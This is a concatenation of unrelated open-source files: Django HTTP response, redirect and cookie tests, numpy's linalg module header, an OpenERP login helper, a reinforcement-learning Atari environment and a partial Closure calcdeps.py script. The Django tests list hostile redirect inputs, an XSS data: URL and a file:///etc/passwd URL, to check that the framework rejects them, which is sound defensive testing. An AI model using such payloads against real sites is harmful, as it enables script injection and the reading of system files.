h['Content-Disposition'] = 'attachment; filename="EdelRot_Blu\u0308te (3)-0.JPG"'
def test_newlines_in_headers(self):
# Bug #10188: Do not allow newlines in headers (CR or LF)
r = HttpResponse()
with self.assertRaises(BadHeaderError):
r.__setitem__('test\rstr', 'test')
with self.assertRaises(BadHeaderError):
r.__setitem__('test\nstr', 'test')
def test_dict_behavior(self):
"""
Test for bug #14020: Make HttpResponse.get work like dict.get
"""
r = HttpResponse()
self.assertIsNone(r.get('test'))
def test_non_string_content(self):
# Bug 16494: HttpResponse should behave consistently with non-strings
r = HttpResponse(12345)
self.assertEqual(r.content, b'12345')
# test content via property
r = HttpResponse()
r.content = 12345
self.assertEqual(r.content, b'12345')
def test_iter_content(self):
r = HttpResponse(['abc', 'def', 'ghi'])
self.assertEqual(r.content, b'abcdefghi')
# test iter content via property
r = HttpResponse()
r.content = ['idan', 'alex', 'jacob']
self.assertEqual(r.content, b'idanalexjacob')
r = HttpResponse()
r.content = [1, 2, 3]
self.assertEqual(r.content, b'123')
# test odd inputs
r = HttpResponse()
r.content = ['1', '2', 3, '\u079e']
# '\xde\x9e' == unichr(1950).encode()
self.assertEqual(r.content, b'123\xde\x9e')
# .content can safely be accessed multiple times.
r = HttpResponse(iter(['hello', 'world']))
self.assertEqual(r.content, r.content)
self.assertEqual(r.content, b'helloworld')
# __iter__ can safely be called multiple times (#20187).
self.assertEqual(b''.join(r), b'helloworld')
self.assertEqual(b''.join(r), b'helloworld')
# Accessing .content still works.
self.assertEqual(r.content, b'helloworld')
# Accessing .content also works if the response was iterated first.
r = HttpResponse(iter(['hello', 'world']))
self.assertEqual(b''.join(r), b'helloworld')
self.assertEqual(r.content, b'helloworld')
# Additional content can be written to the response.
r = HttpResponse(iter(['hello', 'world']))
self.assertEqual(r.content, b'helloworld')
r.write('!')
self.assertEqual(r.content, b'helloworld!')
def test_iterator_isnt_rewound(self):
# Regression test for #13222
r = HttpResponse('abc')
i = iter(r)
self.assertEqual(list(i), [b'abc'])
self.assertEqual(list(i), [])
def test_lazy_content(self):
r = HttpResponse(lazystr('helloworld'))
self.assertEqual(r.content, b'helloworld')
def test_file_interface(self):
r = HttpResponse()
r.write(b"hello")
self.assertEqual(r.tell(), 5)
r.write("привет")
self.assertEqual(r.tell(), 17)
r = HttpResponse(['abc'])
r.write('def')
self.assertEqual(r.tell(), 6)
self.assertEqual(r.content, b'abcdef')
# with Content-Encoding header
r = HttpResponse()
r['Content-Encoding'] = 'winning'
r.write(b'abc')
r.write(b'def')
self.assertEqual(r.content, b'abcdef')
def test_stream_interface(self):
r = HttpResponse('asdf')
self.assertEqual(r.getvalue(), b'asdf')
r = HttpResponse()
self.assertIs(r.writable(), True)
r.writelines(['foo\n', 'bar\n', 'baz\n'])
self.assertEqual(r.content, b'foo\nbar\nbaz\n')
def test_unsafe_redirect(self):
bad_urls = [
'data:text/html,<script>window.alert("xss")</script>',
'mailto:test@example.com',
'file:///etc/passwd',
]
for url in bad_urls:
with self.assertRaises(DisallowedRedirect):
HttpResponseRedirect(url)
with self.assertRaises(DisallowedRedirect):
HttpResponsePermanentRedirect(url)
class HttpResponseSubclassesTests(SimpleTestCase):
def test_redirect(self):
response = HttpResponseRedirect('/redirected/')
self.assertEqual(response.status_code, 302)
# Standard HttpResponse init args can be used
response = HttpResponseRedirect(
'/redirected/',
content='The resource has temporarily moved',
content_type='text/html',
)
self.assertContains(response, 'The resource has temporarily moved', status_code=302)
self.assertEqual(response.url, response['Location'])
def test_redirect_lazy(self):
"""Make sure HttpResponseRedirect works with lazy strings."""
r = HttpResponseRedirect(lazystr('/redirected/'))
self.assertEqual(r.url, '/redirected/')
def test_redirect_repr(self):
response = HttpResponseRedirect('/redirected/')
expected = '<HttpResponseRedirect status_code=302, "text/html; charset=utf-8", url="/redirected/">'
self.assertEqual(repr(response), expected)
def test_invalid_redirect_repr(self):
"""
If HttpResponseRedirect raises DisallowedRedirect, its __repr__()
should work (in the debug view, for example).
"""
response = HttpResponseRedirect.__new__(HttpResponseRedirect)
with self.assertRaisesMessage(DisallowedRedirect, "Unsafe redirect to URL with protocol 'ssh'"):
HttpResponseRedirect.__init__(response, 'ssh://foo')
expected = '<HttpResponseRedirect status_code=302, "text/html; charset=utf-8", url="ssh://foo">'
self.assertEqual(repr(response), expected)
def test_not_modified(self):
response = HttpResponseNotModified()
self.assertEqual(response.status_code, 304)
# 304 responses should not have content/content-type
with self.assertRaises(AttributeError):
response.content = "Hello dear"
self.assertNotIn('content-type', response)
def test_not_modified_repr(self):
response = HttpResponseNotModified()
self.assertEqual(repr(response), '<HttpResponseNotModified status_code=304>')
def test_not_allowed(self):
response = HttpResponseNotAllowed(['GET'])
self.assertEqual(response.status_code, 405)
# Standard HttpResponse init args can be used
response = HttpResponseNotAllowed(['GET'], content='Only the GET method is allowed', content_type='text/html')
self.assertContains(response, 'Only the GET method is allowed', status_code=405)
def test_not_allowed_repr(self):
response = HttpResponseNotAllowed(['GET', 'OPTIONS'], content_type='text/plain')
expected = '<HttpResponseNotAllowed [GET, OPTIONS] status_code=405, "text/plain">'
self.assertEqual(repr(response), expected)
def test_not_allowed_repr_no_content_type(self):
response = HttpResponseNotAllowed(('GET', 'POST'))
del response['Content-Type']
self.assertEqual(repr(response), '<HttpResponseNotAllowed [GET, POST] status_code=405>')
class JsonResponseTests(SimpleTestCase):
def test_json_response_non_ascii(self):
data = {'key': 'łóżko'}
response = JsonResponse(data)
self.assertEqual(json.loads(response.content.decode()), data)
def test_json_response_raises_type_error_with_default_setting(self):
with self.assertRaisesMessage(
TypeError,
'In order to allow non-dict objects to be serialized set the '
'safe parameter to False'
):
JsonResponse([1, 2, 3])
def test_json_response_text(self):
response = JsonResponse('foobar', safe=False)
self.assertEqual(json.loads(response.content.decode()), 'foobar')
def test_json_response_list(self):
response = JsonResponse(['foo', 'bar'], safe=False)
self.assertEqual(json.loads(response.content.decode()), ['foo', 'bar'])
def test_json_response_uuid(self):
u = uuid.uuid4()
response = JsonResponse(u, safe=False)
self.assertEqual(json.loads(response.content.decode()), str(u))
def test_json_response_custom_encoder(self):
class CustomDjangoJSONEncoder(DjangoJSONEncoder):
def encode(self, o):
return json.dumps({'foo': 'bar'})
response = JsonResponse({}, encoder=CustomDjangoJSONEncoder)
self.assertEqual(json.loads(response.content.decode()), {'foo': 'bar'})
def test_json_response_passing_arguments_to_json_dumps(self):
response = JsonResponse({'foo': 'bar'}, json_dumps_params={'indent': 2})
self.assertEqual(response.content.decode(), '{\n "foo": "bar"\n}')
class StreamingHttpResponseTests(SimpleTestCase):
def test_streaming_response(self):
r = StreamingHttpResponse(iter(['hello', 'world']))
# iterating over the response itself yields bytestring chunks.
chunks = list(r)
self.assertEqual(chunks, [b'hello', b'world'])
for chunk in chunks:
self.assertIsInstance(chunk, bytes)
# and the response can only be iterated once.
self.assertEqual(list(r), [])
# even when a sequence that can be iterated many times, like a list,
# is given as content.
r = StreamingHttpResponse(['abc', 'def'])
self.assertEqual(list(r), [b'abc', b'def'])
self.assertEqual(list(r), [])
# iterating over strings still yields bytestring chunks.
r.streaming_content = iter(['hello', 'café'])
chunks = list(r)
# '\xc3\xa9' == unichr(233).encode()
self.assertEqual(chunks, [b'hello', b'caf\xc3\xa9'])
for chunk in chunks:
self.assertIsInstance(chunk, bytes)
# streaming responses don't have a `content` attribute.
self.assertFalse(hasattr(r, 'content'))
# and you can't accidentally assign to a `content` attribute.
with self.assertRaises(AttributeError):
r.content = 'xyz'
# but they do have a `streaming_content` attribute.
self.assertTrue(hasattr(r, 'streaming_content'))
# that exists so we can check if a response is streaming, and wrap or
# replace the content iterator.
r.streaming_content = iter(['abc', 'def'])
r.streaming_content = (chunk.upper() for chunk in r.streaming_content)
self.assertEqual(list(r), [b'ABC', b'DEF'])
# coercing a streaming response to bytes doesn't return a complete HTTP
# message like a regular response does. it only gives us the headers.
r = StreamingHttpResponse(iter(['hello', 'world']))
self.assertEqual(bytes(r), b'Content-Type: text/html; charset=utf-8')
# and this won't consume its content.
self.assertEqual(list(r), [b'hello', b'world'])
# additional content cannot be written to the response.
r = StreamingHttpResponse(iter(['hello', 'world']))
with self.assertRaises(Exception):
r.write('!')
# and we can't tell the current position.
with self.assertRaises(Exception):
r.tell()
r = StreamingHttpResponse(iter(['hello', 'world']))
self.assertEqual(r.getvalue(), b'helloworld')
class FileCloseTests(SimpleTestCase):
def setUp(self):
# Disable the request_finished signal during this test
# to avoid interfering with the database connection.
request_finished.disconnect(close_old_connections)
def tearDown(self):
request_finished.connect(close_old_connections)
def test_response(self):
filename = os.path.join(os.path.dirname(__file__), 'abc.txt')
# file isn't closed until we close the response.
file1 = open(filename)
r = HttpResponse(file1)
self.assertTrue(file1.closed)
r.close()
# when multiple file are assigned as content, make sure they are all
# closed with the response.
file1 = open(filename)
file2 = open(filename)
r = HttpResponse(file1)
r.content = file2
self.assertTrue(file1.closed)
self.assertTrue(file2.closed)
def test_streaming_response(self):
filename = os.path.join(os.path.dirname(__file__), 'abc.txt')
# file isn't closed until we close the response.
file1 = open(filename)
r = StreamingHttpResponse(file1)
self.assertFalse(file1.closed)
r.close()
self.assertTrue(file1.closed)
# when multiple file are assigned as content, make sure they are all
# closed with the response.
file1 = open(filename)
file2 = open(filename)
r = StreamingHttpResponse(file1)
r.streaming_content = file2
self.assertFalse(file1.closed)
self.assertFalse(file2.closed)
r.close()
self.assertTrue(file1.closed)
self.assertTrue(file2.closed)
class CookieTests(unittest.TestCase):
def test_encode(self):
"""Semicolons and commas are encoded."""
c = SimpleCookie()
c['test'] = "An,awkward;value"
self.assertNotIn(";", c.output().rstrip(';')) # IE compat
self.assertNotIn(",", c.output().rstrip(';')) # Safari compat
def test_decode(self):
"""Semicolons and commas are decoded."""
c = SimpleCookie()
c['test'] = "An,awkward;value"
c2 = SimpleCookie()
c2.load(c.output()[12:])
self.assertEqual(c['test'].value, c2['test'].value)
c3 = parse_cookie(c.output()[12:])
self.assertEqual(c['test'].value, c3['test'])
def test_decode_2(self):
c = SimpleCookie()
c['test'] = b"\xf0"
c2 = SimpleCookie()
c2.load(c.output()[12:])
self.assertEqual(c['test'].value, c2['test'].value)
c3 = parse_cookie(c.output()[12:])
self.assertEqual(c['test'].value, c3['test'])
def test_nonstandard_keys(self):
"""
A single non-standard cookie name doesn't affect all cookies (#13007).
"""
self.assertIn('good_cookie', parse_cookie('good_cookie=yes;bad:cookie=yes'))
def test_repeated_nonstandard_keys(self):
"""
A repeated non-standard name doesn't affect all cookies (#15852).
"""
self.assertIn('good_cookie', parse_cookie('a:=b; a:=c; good_cookie=yes'))
def test_python_cookies(self):
"""
Test cases copied from Python's Lib/test/test_http_cookies.py
"""
self.assertEqual(parse_cookie('chips=ahoy; vienna=finger'), {'chips': 'ahoy', 'vienna': 'finger'})
# Here parse_cookie() differs from Python's cookie parsing in that it
# treats all semicolons as delimiters, even within quotes.
self.assertEqual(
parse_cookie('keebler="E=mc2; L=\\"Loves\\"; fudge=\\012;"'),
{'keebler': '"E=mc2', 'L': '\\"Loves\\"', 'fudge': '\\012', '': '"'}
)
# Illegal cookies that have an '=' char in an unquoted value.
self.assertEqual(parse_cookie('keebler=E=mc2'), {'keebler': 'E=mc2'})
# Cookies with ':' character in their name.
self.assertEqual(parse_cookie('key:term=value:term'), {'key:term': 'value:term'})
# Cookies with '[' and ']'.
self.assertEqual(parse_cookie('a=b; c=[; d=r; f=h'), {'a': 'b', 'c': '[', 'd': 'r', 'f': 'h'})
def test_cookie_edgecases(self):
# Cookies that RFC6265 allows.
self.assertEqual(parse_cookie('a=b; Domain=example.com'), {'a': 'b', 'Domain': 'example.com'})
# parse_cookie() has historically kept only the last cookie with the
# same name.
self.assertEqual(parse_cookie('a=b; h=i; a=c'), {'a': 'c', 'h': 'i'})
def test_invalid_cookies(self):
"""
Cookie strings that go against RFC6265 but browsers will send if set
via document.cookie.
"""
# Chunks without an equals sign appear as unnamed values per
# https://bugzilla.mozilla.org/show_bug.cgi?id=169091
self.assertIn('django_language', parse_cookie('abc=def; unnamed; django_language=en'))
# Even a double quote may be an unamed value.
self.assertEqual(parse_cookie('a=b; "; c=d'), {'a': 'b', '': '"', 'c': 'd'})
# Spaces in names and values, and an equals sign in values.
self.assertEqual(parse_cookie('a b c=d e = f; gh=i'), {'a b c': 'd e = f', 'gh': 'i'})
# More characters the spec forbids.
self.assertEqual(parse_cookie('a b,c<>@:/[]?{}=d " =e,f g'), {'a b,c<>@:/[]?{}': 'd " =e,f g'})
# Unicode characters. The spec only allows ASCII.
self.assertEqual(parse_cookie('saint=André Bessette'), {'saint': 'André Bessette'})
# Browsers don't send extra whitespace or semicolons in Cookie headers,
# but parse_cookie() should parse whitespace the same way
# document.cookie parses whitespace.
self.assertEqual(parse_cookie(' = b ; ; = ; c = ; '), {'': 'b', 'c': ''})
def test_httponly_after_load(self):
c = SimpleCookie()
c.load("name=val")
c['name']['httponly'] = True
self.assertTrue(c['name']['httponly'])
def test_load_dict(self):
c = SimpleCookie()
c.load({'name': 'val'})
self.assertEqual(c['name'].value, 'val')
def test_pickle(self):
rawdata = 'Customer="WILE_E_COYOTE"; Path=/acme; Version=1'
expected_output = 'Set-Cookie: %s' % rawdata
C = SimpleCookie()
C.load(rawdata)
self.assertEqual(C.output(), expected_output)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
C1 = pickle.loads(pickle.dumps(C, protocol=proto))
self.assertEqual(C1.output(), expected_output)
| bsd-3-clause |
victor-prado/broker-manager | environment/lib/python3.5/site-packages/numpy/linalg/__init__.py | 84 | 2343 | """
Core Linear Algebra Tools
=========================
=============== ==========================================================
Linear algebra basics
==========================================================================
norm Vector or matrix norm
inv Inverse of a square matrix
solve Solve a linear system of equations
det Determinant of a square matrix
slogdet Logarithm of the determinant of a square matrix
lstsq Solve linear least-squares problem
pinv Pseudo-inverse (Moore-Penrose) calculated using a singular
value decomposition
matrix_power Integer power of a square matrix
matrix_rank Calculate matrix rank using an SVD-based method
=============== ==========================================================
=============== ==========================================================
Eigenvalues and decompositions
==========================================================================
eig Eigenvalues and vectors of a square matrix
eigh Eigenvalues and eigenvectors of a Hermitian matrix
eigvals Eigenvalues of a square matrix
eigvalsh Eigenvalues of a Hermitian matrix
qr QR decomposition of a matrix
svd Singular value decomposition of a matrix
cholesky Cholesky decomposition of a matrix
=============== ==========================================================
=============== ==========================================================
Tensor operations
==========================================================================
tensorsolve Solve a linear tensor equation
tensorinv Calculate an inverse of a tensor
=============== ==========================================================
=============== ==========================================================
Exceptions
==========================================================================
LinAlgError Indicates a failed linear algebra operation
=============== ==========================================================
"""
from __future__ import division, absolute_import, print_function
# To get sub-modules
from .info import __doc__
from .linalg import *
from numpy.testing.nosetester import _numpy_tester
test = _numpy_tester().test
bench = _numpy_tester().bench
| mit |
smartforceplus/SmartForceplus | openerp/service/security.py | 211 | 1510 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
import openerp.exceptions
def login(db, login, password):
res_users = openerp.registry(db)['res.users']
return res_users._login(db, login, password)
def check_super(passwd):
if passwd == openerp.tools.config['admin_passwd']:
return True
else:
raise openerp.exceptions.AccessDenied()
def check(db, uid, passwd):
res_users = openerp.registry(db)['res.users']
return res_users.check(db, uid, passwd)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
lukashermann/pytorch-rl | core/envs/atari.py | 3 | 2986 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from copy import deepcopy
from gym.spaces.box import Box
import inspect
from utils.helpers import Experience # NOTE: here state0 is always "None"
from utils.helpers import preprocessAtari, rgb2gray, rgb2y, scale
from core.env import Env
class AtariEnv(Env): # pixel-level inputs
def __init__(self, args, env_ind=0):
super(AtariEnv, self).__init__(args, env_ind)
assert self.env_type == "atari"
try: import gym
except ImportError as e: self.logger.warning("WARNING: gym not found")
self.env = gym.make(self.game)
self.env.seed(self.seed) # NOTE: so each env would be different
# action space setup
self.actions = range(self.action_dim)
self.logger.warning("Action Space: %s", self.actions)
# state space setup
self.hei_state = args.hei_state
self.wid_state = args.wid_state
self.preprocess_mode = args.preprocess_mode if not None else 0 # 0(crop&resize) | 1(rgb2gray) | 2(rgb2y)
assert self.hei_state == self.wid_state
self.logger.warning("State Space: (" + str(self.state_shape) + " * " + str(self.state_shape) + ")")
def _preprocessState(self, state):
if self.preprocess_mode == 3: # crop then resize
state = preprocessAtari(state)
if self.preprocess_mode == 2: # rgb2y
state = scale(rgb2y(state), self.hei_state, self.wid_state) / 255.
elif self.preprocess_mode == 1: # rgb2gray
state = scale(rgb2gray(state), self.hei_state, self.wid_state) / 255.
elif self.preprocess_mode == 0: # do nothing
pass
return state.reshape(self.hei_state * self.wid_state)
@property
def state_shape(self):
return self.hei_state
def render(self):
return self.env.render()
def visual(self):
if self.visualize:
self.win_state1 = self.vis.image(np.transpose(self.exp_state1, (2, 0, 1)), env=self.refs, win=self.win_state1, opts=dict(title="state1"))
if self.mode == 2:
frame_name = self.img_dir + "frame_%04d.jpg" % self.frame_ind
self.imsave(frame_name, self.exp_state1)
self.logger.warning("Saved Frame @ Step: " + str(self.frame_ind) + " To: " + frame_name)
self.frame_ind += 1
def sample_random_action(self):
return self.env.action_space.sample()
def reset(self):
# TODO: could add random start here, since random start only make sense for atari games
self._reset_experience()
self.exp_state1 = self.env.reset()
return self._get_experience()
def step(self, action_index):
self.exp_action = action_index
self.exp_state1, self.exp_reward, self.exp_terminal1, _ = self.env.step(self.actions[self.exp_action])
return self._get_experience()
| mit |
PeterWangIntel/chromium-crosswalk | third_party/google_input_tools/third_party/closure_library/closure/bin/calcdeps.py | 223 | 18544 | #!/usr/bin/env python
#
# Copyright 2006 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Calculates JavaScript dependencies without requiring Google's build system.
This tool is deprecated and is provided for legacy users.
See build/closurebuilder.py and build/depswriter.py for the current tools.
It iterates over a number of search paths and builds a dependency tree. With
the inputs provided, it walks the dependency tree and outputs all the files
required for compilation.
"""
try:
import distutils.version
except ImportError:
# distutils is not available in all environments
distutils = None
import logging
import optparse
import os
import re
import subprocess
import sys
_BASE_REGEX_STRING = '^\s*goog\.%s\(\s*[\'"](.+)[\'"]\s*\)'
req_regex = re.compile(_BASE_REGEX_STRING % 'require')
prov_regex = re.compile(_BASE_REGEX_STRING % 'provide')
ns_regex = re.compile('^ns:((\w+\.)*(\w+))$')
version_regex = re.compile('[\.0-9]+')
def IsValidFile(ref):
"""Returns true if the provided reference is a file and exists."""
return os.path.isfile(ref)
def IsJsFile(ref):
"""Returns true if the provided reference is a Javascript file."""
return ref.endswith('.js')
def IsNamespace(ref):
"""Returns true if the provided reference is a namespace."""
return re.match(ns_regex, ref) is not None
def IsDirectory(ref):
"""Returns true if the provided reference is a directory."""
return os.path.isdir(ref)
def ExpandDirectories(refs):
"""Expands any directory references into inputs.
Description:
Looks for any directories in the provided references. Found directories
are recursively searched for .js files, which are then added to the result
list.
Args:
refs: a list of references such as files, directories, and namespaces
Returns:
A list of references with directories removed and replaced by any
.js files that are found in them. Also, the paths will be normalized.
"""
result = []
for ref in refs:
if IsDirectory(ref):
# Disable 'Unused variable' for subdirs
# pylint: disable=unused-variable
for (directory, subdirs, filenames) in os.walk(ref):
for filename in filenames:
if IsJsFile(filename):
result.append(os.path.join(directory, filename))
else:
result.append(ref)
return map(os.path.normpath, result)
class DependencyInfo(object):
"""Represents a dependency that is used to build and walk a tree."""
def __init__(self, filename):
self.filename = filename
self.provides = []
self.requires = []
def __str__(self):
return '%s Provides: %s Requires: %s' % (self.filename,
repr(self.provides),
repr(self.requires))
def BuildDependenciesFromFiles(files):
"""Build a list of dependencies from a list of files.
Description:
Takes a list of files, extracts their provides and requires, and builds
out a list of dependency objects.
Args:
files: a list of files to be parsed for goog.provides and goog.requires.
Returns:
A list of dependency objects, one for each file in the files argument.
"""
result = []
filenames = set()
for filename in files:
if filename in filenames:
continue
# Python 3 requires the file encoding to be specified
if (sys.version_info[0] < 3):
file_handle = open(filename, 'r')
else:
file_handle = open(filename, 'r', encoding='utf8')
try:
dep = CreateDependencyInfo(filename, file_handle)
result.append(dep)
finally:
file_handle.close()
filenames.add(filename)
return result
def CreateDependencyInfo(filename, source):
"""Create dependency info.
Args:
filename: Filename for source.
source: File-like object containing source.
Returns:
A DependencyInfo object with provides and requires filled.
"""
dep = DependencyInfo(filename)
for line in source:
if re.match(req_regex, line):
dep.requires.append(re.search(req_regex, line).group(1))
if re.match(prov_regex, line):
dep.provides.append(re.search(prov_regex, line).group(1))
return dep
def BuildDependencyHashFromDependencies(deps):
"""Builds a hash for searching dependencies by the namespaces they provide.
Description:
Dependency objects can provide multiple namespaces. This method enumerates
the provides of each dependency and adds them to a hash that can be used
to easily resolve a given dependency by a namespace it provides.
Args:
deps: a list of dependency objects used to build the hash.
Raises:
Exception: If a multiple files try to provide the same namepace.
Returns:
A hash table { namespace: dependency } that can be used to resolve a
dependency by a namespace it provides.
"""
dep_hash = {}
for dep in deps:
for provide in dep.provides:
if provide in dep_hash:
raise Exception('Duplicate provide (%s) in (%s, %s)' % (
provide,
dep_hash[provide].filename,
dep.filename))
dep_hash[provide] = dep
return dep_hash
def CalculateDependencies(paths, inputs):
"""Calculates the dependencies for given inputs.
Description:
This method takes a list of paths (files, directories) and builds a
searchable data structure based on the namespaces that each .js file
provides. It then parses through each input, resolving dependencies
against this data structure. The final output is a list of files,
including the inputs, that represent all of the code that is needed to
compile the given inputs.
Args:
paths: the references (files, directories) that are used to build the
dependency hash.
inputs: the inputs (files, directories, namespaces) that have dependencies
that need to be calculated.
Raises:
Exception: if a provided input is invalid.
Returns:
A list of all files, including inputs, that are needed to compile the given
inputs.
"""
deps = BuildDependenciesFromFiles(paths + inputs)
search_hash = BuildDependencyHashFromDependencies(deps)
result_list = []
seen_list = []
for input_file in inputs:
if IsNamespace(input_file):
namespace = re.search(ns_regex, input_file).group(1)
if namespace not in search_hash:
raise Exception('Invalid namespace (%s)' % namespace)
input_file = search_hash[namespace].filename
if not IsValidFile(input_file) or not IsJsFile(input_file):
raise Exception('Invalid file (%s)' % input_file)
seen_list.append(input_file)
file_handle = open(input_file, 'r')
try:
for line in file_handle:
if re.match(req_regex, line):
require = re.search(req_regex, line).group(1)
ResolveDependencies(require, search_hash, result_list, seen_list)
finally:
file_handle.close()
result_list.append(input_file)
# All files depend on base.js, so put it first.
base_js_path = FindClosureBasePath(paths)
if base_js_path:
result_list.insert(0, base_js_path)
else:
logging.warning('Closure Library base.js not found.')
return result_list
def FindClosureBasePath(paths):
"""Given a list of file paths, return Closure base.js path, if any.
Args:
paths: A list of paths.
Returns:
The path to Closure's base.js file including filename, if found.
"""
for path in paths:
pathname, filename = os.path.split(path)
if filename == 'base.js':
f = open(path)
is_base = False
# Sanity check that this is the Closure base file. Check that this
# is where goog is defined. This is determined by the @provideGoog
# flag.
for line in f:
if '@provideGoog' in line:
is_base = True
break
f.close()
if is_base:
return path
def ResolveDependencies(require, search_hash, result_list, seen_list):
"""Takes a given requirement and resolves all of the dependencies for it.
Description:
A given requirement may require other dependencies. This method
recursively resolves all dependencies for the given requirement.
Raises:
Exception: when require does not exist in the search_hash.
Args:
require: the namespace to resolve dependencies for.
search_hash: the data structure used for resolving dependencies.
result_list: a list of filenames that have been calculated as dependencies.
This variable is the output for this function.
seen_list: a list of filenames that have been 'seen'. This is required
for the dependency->dependant ordering.
"""
if require not in search_hash:
raise Exception('Missing provider for (%s)' % require)
dep = search_hash[require]
if not dep.filename in seen_list:
seen_list.append(dep.filename)
for sub_require in dep.requires:
ResolveDependencies(sub_require, search_hash, result_list, seen_list)
result_list.append(dep.filename)
def GetDepsLine(dep, base_path):
"""Returns a JS string for a dependency statement in the deps.js file.
Args:
dep: The dependency that we're printing.
base_path: The path to Closure's base.js including filename.
"""
return 'goog.addDependency("%s", %s, %s);' % (
GetRelpath(dep.filename, base_path), dep.provides, dep.requires)
def GetRelpath(path, start):
"""Return a relative path to |path| from |start|."""
# NOTE: Python 2.6 provides os.path.relpath, which has almost the same
# functionality as this function. Since we want to support 2.4, we have
# to implement it manually. :(
path_list = os.path.abspath(os.path.normpath(path)).split(os.sep)
start_list = os.path.abspath(
os.path.normpath(os.path.dirname(start))).split(os.sep)
common_prefix_count = 0
for i in range(0, min(len(path_list), len(start_list))):
if path_list[i] != start_list[i]:
break
common_prefix_count += 1
# Always use forward slashes, because this will get expanded to a url,
# not a file path.
return '/'.join(['..'] * (len(start_list) - common_prefix_count) +
path_list[common_prefix_count:])
def PrintLine(msg, out):
out.write(msg)
out.write('\n')
def PrintDeps(source_paths, deps, out):
"""Print out a deps.js file from a list of source paths.
Args:
source_paths: Paths that we should generate dependency info for.
deps: Paths that provide dependency info. Their dependency info should
not appear in the deps file.
out: The output file.
Returns:
True on success, false if it was unable to find the base path
to generate deps relative to.
"""
base_path = FindClosureBasePath(source_paths + deps)
if not base_path:
return False
PrintLine('// This file was autogenerated by calcdeps.py', out)
excludesSet = set(deps)
for dep in BuildDependenciesFromFiles(source_paths + deps):
if not dep.filename in excludesSet:
PrintLine(GetDepsLine(dep, base_path), out)
return True
def PrintScript(source_paths, out):
for index, dep in enumerate(source_paths):
PrintLine('// Input %d' % index, out)
f = open(dep, 'r')
PrintLine(f.read(), out)
f.close()
def GetJavaVersion():
"""Returns the string for the current version of Java installed."""
proc = subprocess.Popen(['java', '-version'], stderr=subprocess.PIPE)
proc.wait()
version_line = proc.stderr.read().splitlines()[0]
return version_regex.search(version_line).group()
def FilterByExcludes(options, files):
"""Filters the given files by the exlusions specified at the command line.
Args:
options: The flags to calcdeps.
files: The files to filter.
Returns:
A list of files.
"""
excludes = []
if options.excludes:
excludes = ExpandDirectories(options.excludes)
excludesSet = set(excludes)
return [i for i in files if not i in excludesSet]
def GetPathsFromOptions(options):
"""Generates the path files from flag options.
Args:
options: The flags to calcdeps.
Returns:
A list of files in the specified paths. (strings).
"""
search_paths = options.paths
if not search_paths:
search_paths = ['.'] # Add default folder if no path is specified.
search_paths = ExpandDirectories(search_paths)
return FilterByExcludes(options, search_paths)
def GetInputsFromOptions(options):
"""Generates the inputs from flag options.
Args:
options: The flags to calcdeps.
Returns:
A list of inputs (strings).
"""
inputs = options.inputs
if not inputs: # Parse stdin
logging.info('No inputs specified. Reading from stdin...')
inputs = filter(None, [line.strip('\n') for line in sys.stdin.readlines()])
logging.info('Scanning files...')
inputs = ExpandDirectories(inputs)
return FilterByExcludes(options, inputs)
def Compile(compiler_jar_path, source_paths, out, flags=None):
"""Prepares command-line call to Closure compiler.
Args:
compiler_jar_path: Path to the Closure compiler .jar file.
source_paths: Source paths to build, in order.
flags: A list of additional flags to pass on to Closure compiler.
"""
args = ['java', '-jar', compiler_jar_path]
for path in source_paths:
args += ['--js', path]
if flags:
args += flags
logging.info('Compiling with the following command: %s', ' '.join(args))
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
(stdoutdata, stderrdata) = proc.communicate()
if proc.returncode != 0:
logging.error('JavaScript compilation failed.')
sys.exit(1)
else:
out.write(stdoutdata)
def main():
"""The entrypoint for this script."""
logging.basicConfig(format='calcdeps.py: %(message)s', level=logging.INFO)
usage = 'usage: %prog [options] arg'
parser = optparse.OptionParser(usage)
parser.add_option('-i',
'--input',
dest='inputs',
action='append',
help='The inputs to calculate dependencies for. Valid '
'values can be files, directories, or namespaces '
'(ns:goog.net.XhrIo). Only relevant to "list" and '
'"script" output.')
parser.add_option('-p',
'--path',
dest='paths',
action='append',
help='The paths that should be traversed to build the '
'dependencies.')
parser.add_option('-d',
'--dep',
dest='deps',
action='append',
help='Directories or files that should be traversed to '
'find required dependencies for the deps file. '
'Does not generate dependency information for names '
'provided by these files. Only useful in "deps" mode.')
parser.add_option('-e',
'--exclude',
dest='excludes',
action='append',
help='Files or directories to exclude from the --path '
'and --input flags')
parser.add_option('-o',
'--output_mode',
dest='output_mode',
action='store',
default='list',
help='The type of output to generate from this script. '
'Options are "list" for a list of filenames, "script" '
'for a single script containing the contents of all the '
'file, "deps" to generate a deps.js file for all '
'paths, or "compiled" to produce compiled output with '
'the Closure compiler.')
parser.add_option('-c',
'--compiler_jar',
dest='compiler_jar',
action='store',
help='The location of the Closure compiler .jar file.')
parser.add_option('-f',
'--compiler_flag',
'--compiler_flags', # for backwards compatability
dest='compiler_flags',
action='append',
help='Additional flag to pass to the Closure compiler. '
'May be specified multiple times to pass multiple flags.')
parser.add_option('--output_file',
dest='output_file',
action='store',
help=('If specified, write output to this path instead of '
'writing to standard output.'))
(options, args) = parser.parse_args()
search_paths = GetPathsFromOptions(options)
if options.output_file:
out = open(options.output_file, 'w')
else:
out = sys.stdout
if options.output_mode == 'deps':
